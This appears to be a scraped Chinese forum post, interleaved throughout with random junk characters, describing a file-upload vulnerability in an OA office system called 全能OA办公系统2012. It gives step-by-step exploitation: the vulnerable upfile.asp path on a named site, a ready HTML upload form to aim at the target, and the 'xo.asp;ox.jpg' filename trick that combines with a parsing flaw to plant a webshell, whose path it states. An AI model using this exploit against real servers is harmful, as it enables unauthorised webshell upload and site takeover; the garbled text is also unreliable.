全能OA办公系统 上传漏洞; \( z5 [: b. t3 d( j5 j
8 [: w3 \( Z- q系统介绍:0 E7 @4 k9 S9 E% `
. N) ]+ z, ~$ J8 G9 g, Z+ |/ t6 V全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
/ X2 L9 ^& ^% p& A2 K: p
8 n A; A8 f# W) U1 Q, m主要功能:
4 z7 B* R6 X6 U- x0 t# H公司通告
' L% O' `6 x6 U6 E& H工作计划
+ B0 j. |/ L" E1 F. t' G通讯助理
2 L+ j+ w8 j- ]5 s5 Y' z* Q客户资源
( |9 Z7 `6 G1 x! a. f+ l我的公文
8 s& U2 d3 l4 G, ]$ C+ X公文传阅 % y4 z7 v+ [( l8 Q" i# }6 B
公共资源 4 x% g' G& H s `' [/ m5 y
资源预约 ; Y& c% w A. V% M. b
今日考勤
" G3 k" ~) Y$ v2 \8 _个人计划 9 V/ {0 c1 I) B, k8 [( ~, d
个人通讯录 / W5 g! U. \* d2 H$ Y
个人基本档案 - B9 c+ x7 ?2 z; \' r
未读邮件
! N9 Q) O9 W) P7 v! }& K' d* S# A/ d发邮件
& k# Z+ f) b' `, {+ {0 d9 O9 L收件夹
' I6 A6 @7 O$ M* i8 ]寄件夹 ( ~, i M9 O7 d! o7 H; G
网络硬盘 7 y3 P* k/ |% ?) m' y/ g' f/ S- P
网络会议
' M. W' z9 z8 ~/ X+ I网络调查 % f& \9 r' d! f8 ]0 q1 \
交流论坛) v3 u% Q% o. J6 {' p1 T# w
: d, W: }, O# X- Q$ {有兴趣测试的朋友可以下源码看看
* B# W% L5 }3 _1 G, C; l5 ?: e5 g9 ]0 s6 l4 y- B3 Q
源码下载:- _8 J' V" g7 h* ~/ z, i
y. X& K& N- V/ R- n1 }
http://www.mycodes.net/30/4750.htm2 E4 P7 i5 y. h" `
% U/ v d) B+ N& B漏洞介绍:
& o) O* e$ M/ p' B) ^* I8 Y7 M3 `( |8 r" x- N5 c' f5 q' @! `* F1 O5 Z
由upfile.asp上传文件漏洞引起: k* S7 R8 b8 Y/ E: e z/ `) L
* s+ M; q' t( F- V% B- H+ t
测试方法:
: ?" v' D9 Z; U6 a- P. h( o$ h g k1 h( w* g( P0 t
使用名小子上传http://www.itlynn.com/upfile.asp即可. V. N( @0 Q$ T7 N8 W% U
6 W/ p- b5 n [如果upfile.asp文件被删除不存在。* K0 n8 l. z# P; J) W) ]5 F* c) Y% o
; S5 D1 X9 S8 e
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
$ ~2 l- j; }1 c. r/ s6 q- f6 E8 r5 C/ p: w% h& T1 W2 `0 _
如果存在那么将如下代码保存为upfile.html。
( @8 U8 j) N: Y' z2 f, n% ?2 b8 }5 Q' w( a
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。5 W" |3 j9 N& d9 o8 O
8 w' n7 a/ @; X$ P8 p2 ?
1 ~9 S& g. \6 G, K+ t% O
% R6 }* _- e! z. }: D) q" k01 <table border='0' align="center" cellpadding="5">
& N% X& c; y: T7 }, }8 Z- M9 r1 K. U
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
, J& u2 w& q4 v( x& Z( V' s+ F4 m9 O2 ~7 C( ]
03 <tr> t, m1 h% h5 U+ n2 T7 ?' K
; ?* g- R! m, Q! U% |5 i& i
04 <td>报错:</td> 5 a+ n) o* E" p/ n; e2 a0 A! l
! ^5 {& a% g6 B: o! k! i
05 <td><input type='radio' name='errnumber' value='0'>
% b8 T, V/ e0 Z) I6 K9 F% Y( n
- h' [) m# l5 @6 e7 [, {06 自动更名 + |3 i' D m$ o M! L
0 v: ^8 f" }1 K" \# F07 <input type='radio' name='errnumber' value='1' checked>
' i6 Z# Q8 y% k* A
/ W/ |/ }2 [1 @* i# q2 \7 J08 报错方式
0 w5 c! e% d/ c0 N0 L
- \8 f% f- Z' d4 `- f. K3 e- g09 <input type='radio' name='errnumber' value='2'>
, |! Z" @) X5 z+ @% Y5 \# r' T( [, S' H# ?, r" j$ ]
10 直接覆盖</td> 4 |% e/ `# _+ o: G: M
) q3 N" \ {1 W
11 </tr>
9 K, l8 o5 A+ T# t( J$ a
9 P& r8 N. s7 \8 p/ x12 <tr>
i1 I+ A6 q7 s: S; O- q9 I3 R, Q% y" a
13 <td>主题:</td> / o) Q* [+ \) U. i0 ^' i/ w
% p; M) a' r4 T, R% G, G14 <td><input type='text' name='filename' size='30'></td>
$ s. I1 b2 E9 s4 f3 |& F5 ^: y- w0 j$ q) g
15 </tr>
0 v: ?# A, b5 L' j( S0 G! c' F; P* R( [; a$ @
16 <tr> + k+ W0 o: R% `& ]- ^- y# `9 Q
& \! b1 q( Y* ?' m7 M$ f `0 }
17 <td>文件:</td>
) ~9 z' e/ r0 k, x& _
! \/ \, V; u9 z, T5 b! |% t- h18 <td><input type="file"name="fruit"size="30"></td>
4 H( `, T, n2 @9 h
$ M" T2 h z) a$ Q' i19 </tr> & D' U0 |9 s% b- b3 E
* |& E: e5 I$ N/ @4 k5 @1 o- _20 <tr>
$ _, K. ?8 L% ]% K ^3 `9 z4 A+ |2 ~# [# e# C% i! s; G0 j4 v
21 <td valign='top'>简介:</td>
3 Q: X" X" }7 c+ ^, n( K% H |2 Q
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
( I, i0 I/ B. l4 _& S# o; G2 W1 Q4 b0 h7 q! p: G4 L0 j, J
23 </tr> . L2 V7 b; s* e- A Y
6 z7 O M! H' k24
7 `! e& {0 l6 c+ J! B. {" l! [' S; a: z, p# @
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> , D. Q/ f& z2 {/ b( F
2 P' Q" N8 D( T8 A) E! T# H4 e+ \ u
26 </tr>
0 u3 ? K( c3 V* p7 |* l- h: O* M1 m$ Z: F3 a& H! y
27 </form>
4 e& ?8 j1 n' l6 b
* C5 f9 a2 ]/ a' b然后打开上传一个文件名为xo.asp;ox.jpg的文件。2 |5 J3 u8 u0 T) _; y
4 M. m6 z, d8 O( U+ Z; k
5 u+ B+ {. p1 T$ t' |9 b2 ]1 H4 E
5 }6 l8 q+ f3 m; o; v* p& d& @上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg7 \9 x) |# K3 G( R+ X. ~3 B
+ R" B" M3 X5 h/ b( W5 N此漏洞需要配合解析漏洞利用。6 G/ Z$ j8 @3 w
- p6 V0 B% _1 d3 a
|